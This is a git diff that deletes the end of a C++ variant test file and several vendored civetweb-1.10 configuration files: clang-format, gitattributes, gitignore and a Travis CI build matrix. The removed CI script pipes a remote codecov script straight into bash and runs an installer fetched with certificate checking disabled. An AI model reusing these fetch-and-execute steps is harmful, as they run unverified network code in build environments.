-        CHECK(v.which() == 2);
-        Var v2(v);
-        CHECK(v.which() == 2);
-    }
-    {
-        Var v(BadCopy{});
-        CHECK(v.valid());
-        CHECK(v.which() == 3);
-        CHECK_THROWS_AS(Var{v}, BadCopyError);
-    }
-    {   // Test convertible.
-        Var v(GoodInt{});
-        CHECK(v.valid());
-        CHECK(v.which() == 1);
-    }
-    {
-        Var v1(A{});
-        CHECK(v1.which() == 2);
-        Var v2(std::move(v1));
-        CHECK(v1.which() == 2);
-        CHECK(v2.which() == 2);
-        CHECK(get<A>(v1).moved == true);
-    }
-}
-
-TEST_CASE("variant-access")
-{
-    Var v;
-    CHECK(v.which() == 0);
-    CHECK(get<bool>(&v) != nullptr);
-    CHECK(get<bool>(v) == false);
-    CHECK(get<int>(&v) == nullptr);
-    CHECK_THROWS_AS(get<int>(v), bad_variant_access);
-    v = 1024;
-    CHECK(v.which() == 1);
-    CHECK(get<int>(&v) != nullptr);
-    CHECK(get<int>(v) == 1024);
-    get<int>(v) = true;
-    CHECK(v.which() == 1);
-    CHECK(get<int>(v) == 1);
-    v = true;
-    CHECK(v.which() == 0);
-    CHECK(get<bool>(v) == true);
-    CHECK_THROWS_AS(get<A>(v), bad_variant_access);
-    {
-        REQUIRE(v.which() != 2);
-        auto& a = v = A();
-        CHECK(v.which() == 2);
-        CHECK(get<A>(&v) != nullptr);
-        CHECK(get<A>(&v) == &a);
-        CHECK(!a.assigned);
-    }
-    {
-        REQUIRE(v.which() == 2);
-        auto& b = v = A();
-        CHECK(v.which() == 2);
-        CHECK(get<A>(&v) == &b);
-        CHECK(b.assigned);
-    }
-}
-
-TEST_CASE("variant-valuess-by-exception")
-{
-    Var v;
-    CHECK(v.valid());
-    CHECK_THROWS_AS(v = BadInt(), BadIntError);
-    CHECK(v.which() != 0);
-    CHECK(!v.valid());
-    v = 42;
-    CHECK(v.valid());
-
-    Var v2(BadCopy{});
-    CHECK_THROWS_AS(v = v2, BadCopyError);
-    CHECK(!v.valid());
-    CHECK(v2.which() == 3);
-}
-
-TEST_CASE("variant-visit")
-{
-    Visitor v;
-    CHECK(visit(v, Var{}) == 0);
-    CHECK(visit(v, Var{true}) == 0);
-    CHECK(visit(v, Var{0}) == 1);
-    CHECK(visit(v, Var{A{}}) == 2);
-    CHECK(visit(v, Var{BadCopy{}}) == 3);
-}
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/.clang-format b/thirdparty/civetweb-1.10/.clang-format
deleted file mode 100644
index 37a80d9..0000000
--- a/thirdparty/civetweb-1.10/.clang-format
+++ /dev/null
@@ -1,32 +0,0 @@
-# http://clang.llvm.org/docs/ClangFormatStyleOptions.html
-
-BasedOnStyle: LLVM
-
-IndentWidth: 4
-TabWidth: 4
-UseTab: ForIndentation
-ColumnLimit: 80
-
-Language: Cpp
-
-AlignAfterOpenBracket: true
-AllowAllParametersOfDeclarationOnNextLine: false
-AllowShortBlocksOnASingleLine: false
-AllowShortCaseLabelsOnASingleLine: false
-AllowShortFunctionsOnASingleLine: None
-AllowShortIfStatementsOnASingleLine: false
-AllowShortLoopsOnASingleLine: false
-AlwaysBreakAfterDefinitionReturnType: true
-BinPackArguments: false
-BinPackParameters: false
-BreakBeforeBinaryOperators: NonAssignment
-BreakBeforeBraces: Linux
-DerivePointerAlignment: false
-MaxEmptyLinesToKeep: 2
-PenaltyBreakBeforeFirstCallParameter: 100
-
-SpaceBeforeParens: ControlStatements
-SpaceInEmptyParentheses: false
-SpacesInSquareBrackets: false
-
-DisableFormat: false
diff --git a/thirdparty/civetweb-1.10/.gitattributes b/thirdparty/civetweb-1.10/.gitattributes
deleted file mode 100644
index 5c52867..0000000
--- a/thirdparty/civetweb-1.10/.gitattributes
+++ /dev/null
@@ -1,33 +0,0 @@
-# Auto detect text files and perform LF normalization
-* -text
-
-# Custom for Visual Studio
-*.cs     diff=csharp
-*.sln    merge=union
-*.csproj merge=union
-*.vbproj merge=union
-*.fsproj merge=union
-*.dbproj merge=union
-
-# Standard to msysgit
-*.doc    diff=astextplain
-*.DOC    diff=astextplain
-*.docx   diff=astextplain
-*.DOCX   diff=astextplain
-*.dot    diff=astextplain
-*.DOT    diff=astextplain
-*.pdf    diff=astextplain
-*.PDF    diff=astextplain
-*.rtf    diff=astextplain
-*.RTF    diff=astextplain
-
-# Preserver Windows specfic lines endings
-*.cmd text eol=crlf
-
-
-# Settings for github syntax highlighting
-# see https://github.com/github/linguist/blob/master/README.md
-docs/* linguist-documentation
-*.inl linguist-language=C
-*.h linguist-language=C
-include/CivetServer.h linguist-language=C++
diff --git a/thirdparty/civetweb-1.10/.gitignore b/thirdparty/civetweb-1.10/.gitignore
deleted file mode 100644
index f10aa01..0000000
--- a/thirdparty/civetweb-1.10/.gitignore
+++ /dev/null
@@ -1,268 +0,0 @@
-
-civetweb
-civetweb_test
-libcivetweb.a
-libcivetweb.so
-*-cache
-out
-*.dmg
-*.msi
-*.exe
-*.zip
-[oO]utput
-[tT]esting
-
-*.o
-
-#################
-## CMake
-#################
-/CMakeCache.txt
-/CMakeFiles
-/mingw-builds
-
-#################
-## Eclipse
-#################
-
-*.pydevproject
-.project
-.metadata
-bin/
-tmp/
-*.tmp
-*.bak
-*.swp
-*~.nib
-local.properties
-.classpath
-.settings/
-.loadpath
-
-# External tool builders
-.externalToolBuilders/
-
-# Locally stored "Eclipse launch configurations"
-*.launch
-
-# CDT-specific
-.cproject
-
-# PDT-specific
-.buildpath
-
-
-#################
-## Visual Studio
-#################
-
-## Ignore Visual Studio temporary files, build results, and
-## files generated by popular Visual Studio add-ons.
-
-# User-specific files
-*.suo
-*.user
-*.sln.docstates
-
-# Text-mode IDE tools
-cscope.out
-tags
-
-# Build results
-
-[Dd]ebug/
-[Dd]ebug CONSOLE/
-[Rr]elease/
-x64/
-[Bb]in/
-[Oo]bj/
-
-# MSTest test Results
-[Tt]est[Rr]esult*/
-[Bb]uild[Ll]og.*
-
-*_i.c
-*_p.c
-*.ilk
-*.meta
-*.obj
-*.pch
-*.pdb
-*.pgc
-*.pgd
-*.rsp
-*.sbr
-*.tlb
-*.tli
-*.tlh
-*.tmp
-*.tmp_proj
-*.log
-*.vspscc
-*.vssscc
-.builds
-*.pidb
-*.log
-*.scc
-
-# Visual C++ cache files
-ipch/
-*.aps
-*.ncb
-*.opensdf
-*.sdf
-*.cachefile
-*.VC.db
-*.VC.VC.opendb
-
-# Visual Studio profiler
-*.psess
-*.vsp
-*.vspx
-
-# Guidance Automation Toolkit
-*.gpState
-
-# ReSharper is a .NET coding add-in
-_ReSharper*/
-*.[Rr]e[Ss]harper
-
-# TeamCity is a build add-in
-_TeamCity*
-
-# DotCover is a Code Coverage Tool
-*.dotCover
-
-# NCrunch
-*.ncrunch*
-.*crunch*.local.xml
-
-# Installshield output folder
-[Ee]xpress/
-
-# DocProject is a documentation generator add-in
-DocProject/buildhelp/
-DocProject/Help/*.HxT
-DocProject/Help/*.HxC
-DocProject/Help/*.hhc
-DocProject/Help/*.hhk
-DocProject/Help/*.hhp
-DocProject/Help/Html2
-DocProject/Help/html
-
-# Click-Once directory
-publish/
-
-# Publish Web Output
-*.Publish.xml
-*.pubxml
-
-# NuGet Packages Directory
-## TODO: If you have NuGet Package Restore enabled, uncomment the next line
-#packages/
-
-# Windows Azure Build Output
-csx
-*.build.csdef
-
-# Windows Store app package directory
-AppPackages/
-
-# Others
-sql/
-*.Cache
-ClientBin/
-[Ss]tyle[Cc]op.*
-~$*
-*~
-*.dbmdl
-*.[Pp]ublish.xml
-*.pfx
-*.publishsettings
-
-# RIA/Silverlight projects
-Generated_Code/
-
-# Backup & report files from converting an old project file to a newer
-# Visual Studio version. Backup files are not needed, because we have git ;-)
-_UpgradeReport_Files/
-Backup*/
-UpgradeLog*.XML
-UpgradeLog*.htm
-
-# SQL Server files
-App_Data/*.mdf
-App_Data/*.ldf
-
-#############
-## Windows detritus
-#############
-
-# Windows image file caches
-Thumbs.db
-ehthumbs.db
-
-# Folder config file
-Desktop.ini
-
-# Recycle Bin used on file shares
-$RECYCLE.BIN/
-
-# Mac crap
-.DS_Store
-
-
-#############
-## Python
-#############
-
-*.py[co]
-
-# Packages
-*.egg
-*.egg-info
-dist/
-eggs/
-parts/
-var/
-sdist/
-develop-eggs/
-.installed.cfg
-
-# Installer logs
-pip-log.txt
-
-# Unit test / coverage reports
-.coverage
-.tox
-
-#Translations
-*.mo
-
-#Mr Developer
-.mr.developer.cfg
-
-
-##########################
-## Files created by tests
-##########################
-requests.db
-
-##########################
-## Files created by ctags
-##########################
-?tags
-?tags?
-
-##########################
-## Files created by autotools
-##########################
-*.lo
-.libs
-
-##########################
-## Travis Build Dir
-##########################
-ci/lua
-
-
diff --git a/thirdparty/civetweb-1.10/.travis.yml b/thirdparty/civetweb-1.10/.travis.yml
deleted file mode 100644
index 2dd926c..0000000
--- a/thirdparty/civetweb-1.10/.travis.yml
+++ /dev/null
@@ -1,694 +0,0 @@
-##############################################################################

-# Travis version specific build environment specification

-##############################################################################

-

-# The "precise" build environment on Travis is in the process of being decommissioned

-# see https://blog.travis-ci.com/2017-08-31-trusty-as-default-status

-# The "precise=true"+"sudo=required" environment seems to lack IPv6 support.

-# According to some tests, all "sudo=required" environments do not support IPv6, see 

-# https://github.com/travis-ci/travis-ci/issues/8361#issuecomment-328263113

-# The container environments for "sudo=false" support IPv6 localhost [::1] 

-# connections for server/client test. Thus, all tests with ENABLE_IPV6=YES

-#

-

-

-##############################################################################

-# Project specific settings

-##############################################################################

-

-language: c

-

-cache:

-  directories:

-  - $HOME/third-party

-

-osx_image: xcode8

-

-addons:

-  apt:

-    packages:

-      - cmake

-      - openssl

-      - libssl-dev

-    sources:

-      - kubuntu-backports

-

-

-before_install:

-  - if [ "${TRAVIS_OS_NAME}" == "linux" ]; then

-      mkdir $HOME/usr;

-      export PATH="$HOME/usr/bin:$PATH";

-      wget https://cmake.org/files/v3.7/cmake-3.7.2-Linux-x86_64.sh --no-check-certificate;

-      chmod +x cmake-3.7.2-Linux-x86_64.sh;

-      ./cmake-3.7.2-Linux-x86_64.sh --prefix=$HOME/usr --exclude-subdir --skip-license;

-    fi

-  - cmake --version

-

-

-install:

-  - if [ "${BUILD_TYPE}" == "Coverage" -a "${TRAVIS_OS_NAME}" == "linux" ]; then

-      PATH=~/.local/bin:${PATH};

-      pip install --user --upgrade pip;

-      pip install --user cpp-coveralls;

-    fi

-

-before_script:

-  # Check some settings of the build server (operating system, IPv6 availability, directory)

-  - uname -a

-  - ifconfig

-  - pwd

-  - ls -la

-  - if [ "${TRAVIS_OS_NAME}" == "linux" ]; then

-      apt-cache search gcc | grep "GNU C compiler";

-      apt-cache search clang | grep compiler;

-    fi

-  - if [[ "${BUILD_TYPE}" == "OSX_OPENSSL_1_1" ]]; then brew install openssl@1.1 ;fi

-  # Generate the build scripts with CMake

-  - mkdir output

-  - gcc test/cgi_test.c -o output/cgi_test.cgi

-  - cd output

-  - cmake --version

-  - cmake

-    -G "Unix Makefiles"

-    -DCMAKE_BUILD_TYPE=${BUILD_TYPE}

-    -DBUILD_SHARED_LIBS=${BUILD_SHARED}

-    "-DCIVETWEB_THIRD_PARTY_DIR=${HOME}/third-party"

-    -DCIVETWEB_ENABLE_THIRD_PARTY_OUTPUT=YES

-    -DCIVETWEB_ENABLE_SSL=${ENABLE_SSL}

-    -DCIVETWEB_DISABLE_CGI=${NO_CGI}

-    -DCIVETWEB_SERVE_NO_FILES=${NO_FILES}

-    -DCIVETWEB_ENABLE_SSL_DYNAMIC_LOADING=${ENABLE_SSL_DYNAMIC_LOADING}

-    -DCIVETWEB_SSL_OPENSSL_API_1_1=${OPENSSL_1_1}

-    -DCIVETWEB_ENABLE_WEBSOCKETS=${ENABLE_WEBSOCKETS}

-    -DCIVETWEB_ENABLE_CXX=${ENABLE_CXX}

-    -DCIVETWEB_ENABLE_IPV6=${ENABLE_IPV6}

-    -DCIVETWEB_ENABLE_SERVER_STATS=${ENABLE_SERVER_STATS}

-    -DCIVETWEB_ENABLE_LUA=${ENABLE_LUA}

-    -DCIVETWEB_ENABLE_LUA_SHARED=${ENABLE_LUA_SHARED}

-    -DCIVETWEB_ENABLE_DUKTAPE=${ENABLE_DUKTAPE}

-    -DCIVETWEB_DISABLE_CACHING=${NO_CACHING}

-    -DCIVETWEB_C_STANDARD=${C_STANDARD}

-    -DCIVETWEB_CXX_STANDARD=${CXX_STANDARD}

-    -DCIVETWEB_ALLOW_WARNINGS=${ALLOW_WARNINGS}

-    ${ADDITIONAL_CMAKE_ARGS}

-    ..

-  - ls -la

-

-script:

-  - if [ "${MACOSX_PACKAGE}" == "1" ]; then

-      cd "${TRAVIS_BUILD_DIR}";

-      make -f Makefile.osx package;

-    else

-      CTEST_OUTPUT_ON_FAILURE=1 make all test;

-    fi

-

-# Coveralls options: https://github.com/eddyxu/cpp-coveralls/blob/master/README.md

-after_success:

-  - if [ "${BUILD_TYPE}" == "Coverage" -a "${TRAVIS_OS_NAME}" == "linux" ]; then

-      coveralls --include src --exclude src/main.c --exclude src/third_party --include include --gcov-options '\-lp' --root .. --build-root .;

-      bash <(curl -s https://codecov.io/bash);

-    fi

-

-

-##############################################################################

-# build matrix (auto generated)

-##############################################################################

-

-

-matrix:

-  fast_finish: false

-  include:

-

-  - dist: trusty

-    sudo: false

-    os: linux

-    compiler: clang

-    addons:

-      apt:

-        sources:

-          - ubuntu-toolchain-r-test

-          - llvm-toolchain-precise-3.8

-        packages:

-          - clang-3.8

-    env:

-      idx=1

-      N=Clang3.8-Linux-Minimal-Debug

-      MATRIX_EVAL="CC=clang-3.8 && CXX=clang++-3.8"

-      BUILD_TYPE=Debug

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=0

-      BUILD_SHARED=NO

-      NO_FILES=YES

-      ENABLE_SSL=NO

-      NO_CGI=YES

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_SERVER_STATS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-  - dist: trusty

-    sudo: false

-    os: linux

-    compiler: clang

-    addons:

-      apt:

-        sources:

-          - ubuntu-toolchain-r-test

-          - llvm-toolchain-precise-3.8

-        packages:

-          - clang-3.8

-    env:

-      idx=2

-      N=Clang3.8-Linux-Default-Release

-      MATRIX_EVAL="CC=clang-3.8 && CXX=clang++-3.8"

-      BUILD_TYPE=Release

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=7

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_SERVER_STATS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-  - dist: trusty

-    sudo: false

-    os: linux

-    compiler: clang

-    addons:

-      apt:

-        sources:

-          - ubuntu-toolchain-r-test

-          - llvm-toolchain-precise-3.8

-        packages:

-          - clang-3.8

-    env:

-      idx=3

-      N=Clang3.8-Linux-Default-Release

-      MATRIX_EVAL="CC=clang-3.8 && CXX=clang++-3.8"

-      BUILD_TYPE=Release

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=7

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_SERVER_STATS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-  - dist: trusty

-    sudo: false

-    os: linux

-    compiler: clang

-    addons:

-      apt:

-        sources:

-          - ubuntu-toolchain-r-test

-          - llvm-toolchain-precise-3.8

-        packages:

-          - clang-3.8

-    env:

-      idx=4

-      N=Clang3.8-Linux-Complete-NoLua-Release

-      MATRIX_EVAL="CC=clang-3.8 && CXX=clang++-3.8"

-      BUILD_TYPE=Release

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=31

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=YES

-      ENABLE_WEBSOCKETS=YES

-      ENABLE_SERVER_STATS=YES

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=YES

-      ALLOW_WARNINGS=YES

-

-

-  - dist: trusty

-    sudo: false

-    os: linux

-    compiler: gcc

-    addons:

-      apt:

-        sources:

-          - ubuntu-toolchain-r-test

-        packages:

-          - g++-5

-    env:

-      idx=5

-      N=GCC5-Linux-Complete-NoLua-Release

-      MATRIX_EVAL="CC=gcc-5 && CXX=g++-5"

-      BUILD_TYPE=Release

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=31

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=YES

-      ENABLE_WEBSOCKETS=YES

-      ENABLE_SERVER_STATS=YES

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=YES

-      ALLOW_WARNINGS=YES

-  

-  - os: linux

-    compiler: gcc

-    env:

-      idx=6

-      N=GCCAnyVersion-Linux-Coverage

-      BUILD_TYPE=Coverage

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=31

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=YES

-      ENABLE_WEBSOCKETS=YES

-      ENABLE_SERVER_STATS=YES

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-  - os: osx

-    compiler: clang

-    env:

-      idx=7

-      N=Clang-OSX-Complete-NoLua-Release

-      BUILD_TYPE=Release

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=31

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=YES

-      ENABLE_WEBSOCKETS=YES

-      ENABLE_SERVER_STATS=YES

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=YES

-      ALLOW_WARNINGS=YES

-

-  -

-    os: osx

-    compiler: clang

-    env:

-      idx=8

-      N=Clang-OSX-Complete-NoLua-Release-OpenSSL_1_1_NoDynLoad

-      BUILD_TYPE=OSX_OPENSSL_1_1

-      ENABLE_SSL_DYNAMIC_LOADING=NO

-      OPENSSL_1_1=YES

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=31

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=YES

-      ENABLE_WEBSOCKETS=YES

-      ENABLE_SERVER_STATS=YES

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=YES

-      ALLOW_WARNINGS=YES

-      OPENSSL_ROOT_DIR="/usr/local/opt/openssl@1.1"

-      LDFLAGS="-L${OPENSSL_ROOT_DIR}/lib"

-      CFLAGS="-I${OPENSSL_ROOT_DIR}/include"

-      ADDITIONAL_CMAKE_ARGS="-DCMAKE_SHARED_LINKER_FLAGS=${LDFLAGS} -DCMAKE_C_FLAGS=${CFLAGS}"

-      PATH="${OPENSSL_ROOT_DIR}/bin:$PATH"

-      DYLD_LIBRARY_PATH="${OPENSSL_ROOT_DIR}/lib:${DYLD_LIBRARY_PATH}"

-

-  - dist: trusty

-    sudo: false

-    os: linux

-    compiler: clang

-    addons:

-      apt:

-        sources:

-          - ubuntu-toolchain-r-test

-          - llvm-toolchain-trusty-5.0

-        packages:

-          - clang-5.0

-    env:

-      idx=9

-      N=Clang50-Linux-Default-Shared

-      BUILD_TYPE=Debug

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=7

-      BUILD_SHARED=YES

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_SERVER_STATS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-      MATRIX_EVAL="CC=clang-3.8 && CXX=clang++-3.8"

-

-  -

-    os: linux

-    dist: precise

-    sudo: required

-    compiler: clang

-    env:

-      idx=10

-      N=Precise-Clang-Linux-Default

-      BUILD_TYPE=Debug

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=7

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_SERVER_STATS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-  -

-    os: osx

-    compiler: clang

-    env:

-      idx=11

-      N=OSX-Package

-      BUILD_TYPE=Release

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=31

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=YES

-      ENABLE_WEBSOCKETS=YES

-      ENABLE_SERVER_STATS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-      MACOSX_PACKAGE=1

-

-  - dist: trusty

-    sudo: false

-    os: linux

-    compiler: clang

-    addons:

-      apt:

-        sources:

-          - ubuntu-toolchain-r-test

-          - llvm-toolchain-trusty-3.8

-        packages:

-          - clang-3.8

-    env:

-      idx=12

-      N=Clang-Linux-32bit-Complete-NoLua-Release

-      ARCH=x86

-      BUILD_TYPE=Release

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=31

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=YES

-      ENABLE_WEBSOCKETS=YES

-      ENABLE_SERVER_STATS=YES

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=YES

-      ALLOW_WARNINGS=YES

-      MATRIX_EVAL="CC=clang-3.8 && CXX=clang++-3.8"

-

-

-### Test all build types:

-# According to CMakeLists, options are:

-# None Debug Release RelWithDebInfo MinSizeRel Coverage

-

-  -

-    os: linux

-    compiler: clang

-    env:

-      idx=13

-      N=NoSslDynamicLoading

-      BUILD_TYPE=Release

-      ENABLE_SSL_DYNAMIC_LOADING=NO

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      ENABLE_LUA_SHARED=NO

-      FEATURES=31

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=YES

-      ENABLE_WEBSOCKETS=YES

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-      MATRIX_EVAL="CC=clang-3.8 && CXX=clang++-3.8"

-

-  -

-    os: linux

-    compiler: gcc

-    env:

-      idx=14

-      N=GCCLinuxDefault_Debug

-      BUILD_TYPE=Debug

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=7

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-  -

-    os: linux

-    compiler: gcc

-    env:

-      idx=15

-      N=GCCLinuxDefault_RelWithDebInfo

-      BUILD_TYPE=RelWithDebInfo

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=7

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-  -

-    os: linux

-    compiler: gcc

-    env:

-      idx=16

-      N=GCCLinuxDefault_MinSizeRel

-      BUILD_TYPE=MinSizeRel

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=7

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-  -

-    os: linux

-    compiler: gcc

-    env:

-      idx=17

-      N=GCCLinuxDefault_None

-      BUILD_TYPE=None

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=7

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-

-#### Now all define combinations, but only for Linux clang

-##### Generated with Lua:

-#

-#  function YN(i,b)

-#    local bits = {}

-#    while (i > 0.5) do

-#      i = math.floor(i)

-#      bits[#bits+1] = (math.mod(i, 2) == 1)

-#      i = i/2

-#    end

-#    if (bits[b]) then

-#      return "YES"

-#    end

-#    return "NO"

-#  end

-#  function INV(t)

-#    if t=="YES" then

-#      return "NO"

-#    elseif t=="NO" then

-#      return "YES"

-#    else

-#      assert("ERROR in INV!")

-#    end

-#  end

-#  for i=0,511 do

-#    if (YN(i, 6)=="NO") and (YN(i, 7)=="NO") then

-#      print("  -")

-#      print("    os: linux")

-#      print("    compiler: clang")

-#      print("    env:")

-#      print("      N=C" .. tostring(i) .. "_")

-#      print("      BUILD_TYPE=Release")

-#      print("      ENABLE_SSL_DYNAMIC_LOADING=YES")

-#      print("      OPENSSL_1_1=NO")

-#      print("      ENABLE_CXX=NO")

-#      print("      C_STANDARD=auto")

-#      print("      CXX_STANDARD=auto")

-#      print("      ENABLE_LUA_SHARED=NO")

-#      print("      FEATURES=" .. tostring(i))

-#      print("      BUILD_SHARED=NO")

-#      print("      NO_FILES=" .. INV(YN(i, 1)))

-#      print("      ENABLE_SSL=" .. YN(i, 2))

-#      print("      NO_CGI=" .. INV(YN(i, 3)))

-#      print("      ENABLE_IPV6=" .. YN(i, 4))

-#      print("      ENABLE_WEBSOCKETS=" .. YN(i, 5))

-#      print("      ENABLE_LUA=" .. YN(i, 6))

-#      print("      ENABLE_DUKTAPE=" .. YN(i, 7))

-#      print("      NO_CACHING=" .. INV(YN(i, 8)))

-#      print("      ENABLE_SERVER_STATS=" .. YN(i, 9))

-#      print("")

-#    end

-#  end

-#

-

-# TODO: Regenerate this matrix, once a stable Travis build is re-established

-

-

